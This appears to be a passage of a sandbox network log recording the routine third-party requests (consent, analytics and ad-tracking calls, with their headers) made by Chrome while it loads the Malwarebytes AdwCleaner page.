                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/x-javascript
                                                                                                                                                                      content-length: 1722
                                                                                                                                                                      cache-control: public, max-age=86400
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: xRLaImDOyX0qRBCU8O7tmg==
                                                                                                                                                                      last-modified: Thu, 01 Dec 2022 17:04:00 GMT
                                                                                                                                                                      etag: 0x8DAD3BE0A9504DA
                                                                                                                                                                      x-ms-request-id: ee9921c9-001e-00de-73e1-08884f000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 17179
                                                                                                                                                                      expires: Tue, 10 Jan 2023 12:49:04 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a73ec09b766-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/consent/82971089-2677-4e1e-8fab-44444f76330b/eef9d10b-0829-4459-966f-9c7317989fae/en.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /consent/82971089-2677-4e1e-8fab-44444f76330b/eef9d10b-0829-4459-966f-9c7317989fae/en.json HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: application/x-javascript
                                                                                                                                                                      content-length: 13477
                                                                                                                                                                      cache-control: public, max-age=86400
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: z/U+4nq8/JTLdEKEzbQHmA==
                                                                                                                                                                      last-modified: Thu, 01 Dec 2022 17:04:17 GMT
                                                                                                                                                                      etag: 0x8DAD3BE14B4D868
                                                                                                                                                                      x-ms-request-id: eec5e84a-001e-00de-27f7-08884f000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 79338
                                                                                                                                                                      expires: Tue, 10 Jan 2023 12:49:05 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a766ebab766-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/v2/otPcPanel.json
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/6.38.0/assets/v2/otPcPanel.json HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      content-length: 13296
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      content-md5: BJ08KLAvpzZpuIY3VesHLg==
                                                                                                                                                                      last-modified: Thu, 21 Jul 2022 06:31:11 GMT
                                                                                                                                                                      etag: 0x8DA6AE29AA07224
                                                                                                                                                                      x-ms-request-id: 3b7fee91-d01e-005f-18e1-082a18000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 15189
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a774f7eb766-AMS
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/otCommonStyles.css
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.148.64:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /scripttemplates/6.38.0/assets/otCommonStyles.css HTTP/2.0
                                                                                                                                                                      host: cdn.cookielaw.org
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: text/css
                                                                                                                                                                      content-md5: TLLtdkuMahUQRVIfmZNHNw==
                                                                                                                                                                      last-modified: Thu, 21 Jul 2022 06:31:23 GMT
                                                                                                                                                                      x-ms-request-id: c42d6709-001e-0152-3ce1-088341000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                      access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: max-age=86400
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 11952
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a774f80b766-AMS
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.18.27.85:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /cookieconsentpub/v1/geo/location HTTP/2.0
                                                                                                                                                                      host: geolocation.onetrust.com
                                                                                                                                                                      accept: application/json
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:04 GMT
                                                                                                                                                                      content-type: application/json
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-headers: Content-Type
                                                                                                                                                                      access-control-allow-methods: GET, OPTIONS
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a754eaab8f4-AMS
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      95.101.74.227:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /li.lms-analytics/insight.min.js HTTP/2.0
                                                                                                                                                                      host: snap.licdn.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      last-modified: Sun, 08 Jan 2023 11:26:38 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=72888
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-length: 482
                                                                                                                                                                      x-cdn: AKAM
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://snap.licdn.com/li.lms-analytics/insight.beta.min.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      95.101.74.227:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /li.lms-analytics/insight.beta.min.js HTTP/2.0
                                                                                                                                                                      host: snap.licdn.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      last-modified: Sun, 08 Jan 2023 11:26:37 GMT
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      content-encoding: gzip
                                                                                                                                                                      cache-control: max-age=73005
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-length: 4777
                                                                                                                                                                      x-cdn: AKAM
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://unpkg.com/web-vitals@1.1.0/dist/web-vitals.umd.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.16.122.175:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /web-vitals@1.1.0/dist/web-vitals.umd.js HTTP/2.0
                                                                                                                                                                      host: unpkg.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      content-type: application/javascript; charset=utf-8
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      cache-control: public, max-age=31536000
                                                                                                                                                                      last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                                                      etag: W/"1060-9qPq4bqeRCeFWudNuS98Bp0PQDY"
                                                                                                                                                                      via: 1.1 fly.io
                                                                                                                                                                      fly-request-id: 01GG9CAAF2FGBQNQFGEB98RB16-ams
                                                                                                                                                                      cf-cache-status: HIT
                                                                                                                                                                      age: 6506323
                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      server: cloudflare
                                                                                                                                                                      cf-ray: 786d4a7829af1c8d-AMS
                                                                                                                                                                      content-encoding: br
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://munchkin.marketo.net/munchkin.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      23.46.212.45:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /munchkin.js HTTP/1.1
                                                                                                                                                                      Host: munchkin.marketo.net
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                      Referer: https://www.malwarebytes.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                      ETag: "92b41a298690c047b0c4602dd843cba4:1662686319.691662"
                                                                                                                                                                      Last-Modified: Fri, 09 Sep 2022 01:18:39 GMT
                                                                                                                                                                      Server: AkamaiNetStorage
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      Content-Length: 728
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      P3P: policyref="http://www.marketo.com/w3c/p3p.xml", CP="NOI DSP COR NID CURi OUR NOR"
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://munchkin.marketo.net/162/munchkin.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      23.46.212.45:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /162/munchkin.js HTTP/1.1
                                                                                                                                                                      Host: munchkin.marketo.net
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                      Referer: https://www.malwarebytes.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                      ETag: "75daf56f6191efe42577301908659c29:1656637152.894482"
                                                                                                                                                                      Last-Modified: Fri, 01 Jul 2022 00:59:12 GMT
                                                                                                                                                                      Server: AkamaiNetStorage
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                      Cache-Control: max-age=8640000
                                                                                                                                                                      Expires: Wed, 19 Apr 2023 12:49:05 GMT
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      Content-Length: 4677
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      P3P: policyref="http://www.marketo.com/w3c/p3p.xml", CP="NOI DSP COR NID CURi OUR NOR"
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://analytics.google.com/g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.179.142:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer HTTP/2.0
                                                                                                                                                                      host: analytics.google.com
                                                                                                                                                                      content-length: 0
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: text/plain;charset=UTF-8
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      cookie: 1P_JAR=2023-01-09-12
                                                                                                                                                                      cookie: NID=511=HBMbtXOMP9VDBN7g3ldDYsEVs_PIHgBuMTHG1uLIX2HhpmuxAsHkYrzHtkxt4IK9mLs7B-MY7SYbJ330XCFKx_CsXMhjWYGZuDphZPfIMlchww7MM_J7gx-ZriK_VxNGnmV5deeuDvXyaO-1AFhsho4wwdNUgjfVn5EvemsBPRg
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://t.co/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.244.42.5:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29 HTTP/2.0
                                                                                                                                                                      host: t.co
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      perf: 7626143928
                                                                                                                                                                      server: tsa_o
                                                                                                                                                                      set-cookie: muc_ads=551bffa6-e67e-46b7-929c-6426e5ee547b; Max-Age=63072000; Expires=Wed, 08 Jan 2025 12:49:05 GMT; Path=/; Domain=t.co; Secure; SameSite=None
                                                                                                                                                                      content-type: image/gif;charset=utf-8
                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                      content-length: 43
                                                                                                                                                                      x-transaction-id: cbf306ea58ec92b3
                                                                                                                                                                      strict-transport-security: max-age=0
                                                                                                                                                                      x-response-time: 102
                                                                                                                                                                      x-connection-hash: 3b01fb4ace1bf26bc21355b99d0bb1d568ada8652b822aed4f9fcd8f7d36f3cd
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://analytics.twitter.com/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.244.42.67:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29 HTTP/2.0
                                                                                                                                                                      host: analytics.twitter.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 200
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:05 GMT
                                                                                                                                                                      perf: 7626143928
                                                                                                                                                                      server: tsa_o
                                                                                                                                                                      set-cookie: personalization_id="v1_7qsNMFCjluXlJsaXP/DdxA=="; Max-Age=63072000; Expires=Wed, 08 Jan 2025 12:49:05 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                                      content-type: image/gif;charset=utf-8
                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                      content-length: 43
                                                                                                                                                                      x-transaction-id: 1e106670c6c14e1b
                                                                                                                                                                      strict-transport-security: max-age=631138519
                                                                                                                                                                      x-response-time: 104
                                                                                                                                                                      x-connection-hash: e716377b5ab86099ef31213139a173ea4fe2131bcbaceb66325e1217cf81d753
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://stats.g.doubleclick.net/g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.250.27.154:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1 HTTP/2.0
                                                                                                                                                                      host: stats.g.doubleclick.net
                                                                                                                                                                      content-length: 0
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: text/plain;charset=UTF-8
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://privacyportal.onetrust.com/request/v1/consentreceipts
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      104.18.27.85:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /request/v1/consentreceipts HTTP/2.0
                                                                                                                                                                      host: privacyportal.onetrust.com
                                                                                                                                                                      content-length: 7878
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      content-type: text/plain;charset=UTF-8
                                                                                                                                                                      accept: */*
                                                                                                                                                                      origin: https://www.malwarebytes.com
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      referer: https://www.malwarebytes.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 201
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:49:06 GMT
                                                                                                                                                                      content-length: 0
                                                                                                                                                                      vary: Origin
                                                                                                                                                                      vary: Access-Control-Request-Method
                                                                                                                                                                      vary: Access-Control-Request-Headers
